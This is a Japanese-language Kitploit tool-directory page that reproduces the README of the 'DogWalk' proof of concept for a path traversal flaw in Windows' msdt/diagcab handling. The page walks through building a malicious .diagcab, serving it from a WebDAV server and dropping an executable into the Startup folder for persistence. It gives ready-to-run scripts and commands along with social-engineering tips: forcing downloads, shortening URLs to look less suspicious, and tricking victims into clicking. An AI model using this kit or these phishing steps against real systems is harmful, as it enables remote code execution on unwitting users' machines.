Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DogWalk-rce-poc — 🐾Dogwalk PoC (diagcabファイルを使用してWindows上でRCEを取得する) | Kitploit
ツール/GitHubGitHub/ariary/dogwalk-rce-poc
ペイロード生成永続化メカニズムエクスプロイトペネトレーションテスト
GitHubariary/dogwalk-rce-poc

DogWalk-rce-poc

🐾Dogwalk PoC (diagcabファイルを使用してWindows上でRCEを取得する)

リポジトリを見る
761454年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dogwalk Proof-of-Concept🐾

root@kitploit:~

🚨 免責事項 🚨



このPoCにより、攻撃者はWindowsの被害者端末でリモートコードインジェクションを実行できます。
このリポジトリの目的は、<a href=https://github.com/irsl/microsoft-diagcab-rce-poc>最初のリポジトリよりもさらに使いやすいPoCを提供することです。
事前の許可なく使用しないでください!

引き起こされる被害と悪用の容易さを考慮すると、マイクロソフトが修正してくれることを願います
2022年7月更新: マイクロソフトはmsdtの脆弱性をまだパッチしていませんが、Microsoft Defenderはそれを検出できます

  • 🧠 仕組みを理解する
  • 🐾 実行する
  • 📺 見せて

コアコンセプト: Microsoft の Diagcab テクノロジ (msdt) におけるパストラバーサル脆弱性で、リモートコード実行につながる可能性があります。
完全なアドバイザリはブログ記事にあります。
この脆弱性は2年間報告されています(@irsl による)が、まだ修正されていません!

仕組みは?

このProof-of-Conceptは、悪意のある .diagcab ファイルをホストするwebdavサーバーをセットアップし、パストラバーサルを実行して悪意のある実行ファイルを C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup に書き込みます。このフォルダに実行ファイルを書き込むと、ユーザーがWindowsマシンを起動するたびに実行されます。これはブートログオン自動起動実行と呼ばれます。

つまり、基本的に必要なものは次のとおりです:

  • webDAVサーバー
  • 悪意のある .diagcab ファイル
  • 悪意のある実行ファイル (PoCには正規のものや基本的なテキストファイルで十分です)

🎬 シナリオ

  1. 被害者は、.diagcab ファイルをダウンロードするリンク(フィッシング、ソーシャルエンジニアリング、その他何でも)を訪問します。

(💡 ブラウザでURLを閲覧したときにファイルを自動的にダウンロードさせるには、Content-type: application/octet-stream レスポンスヘッダーを使用します)

  1. 被害者はダウンロードされたファイルをクリックします(ブラウザのダウンロードフォルダをクリックするだけで、簡単に、あるいは偶然に起こり得ます)
  2. cabファイルがwebdavの悪意のある実行ファイルをロードし -> (パストラバーサル) スタートアップメニューにダウンロードされます
  3. ユーザーがデバイスを再起動すると -> (RCE)

実行しよう

ステップバイステップで進めるのが面倒な場合(または急いでいる場合)は次のとおりです:

root@kitploit:~
./hurry-dogwalk.sh [WEBDAV_URL]         # need docker
# Stop the server
./hurry-dogwalk.sh --clean

それ以外の場合は ↓↓

🔨 .diagcab ファイルを作成する

  • .diagcfg は、1つ以上の診断パッケージへの参照を保持し、それらに関するメタ情報を提供する単純なXMLファイルです。
  • これらはMicrosoftキャビネットファイルアーカイブにパッケージ化され、.diagcab 拡張子で保存されます。

最初に custom.diagcfg をビルドします:

root@kitploit:~
./build-malicious-diagcfg.sh --url [WEBDAV_URL]

次に hotfix895214.diagcab をビルドします:

root@kitploit:~
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe

最後に、./webdav/diagcab-webdav-poc/config ディレクトリに移動します。

🏗️ サーバーをセットアップする

被害者マシンに転送したい実行ファイルを ./webdav/malicious ディレクトリ内に置きます... (ここでは定番の calc.exe を使用します)

...そしてサーバーを起動します:

root@kitploit:~
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl

悪意のある .diagcab は https://[WEBDAV_URL]/config/hotfix895214.diagcab で入手できます。あとは被害者を騙してこのリンクをクリックさせるだけです。

(💡URL短縮サービスを使用すると、不審に見えにくくなります)

👁️ 待って見ていてください

Dogwalk のセットアップ

💡 デフォルトではwebdav通信が有効になっていないようです。機能させるための回避策についてはmitigations.txtを参照してください。

🐾🐾

demo

ツールをダウンロード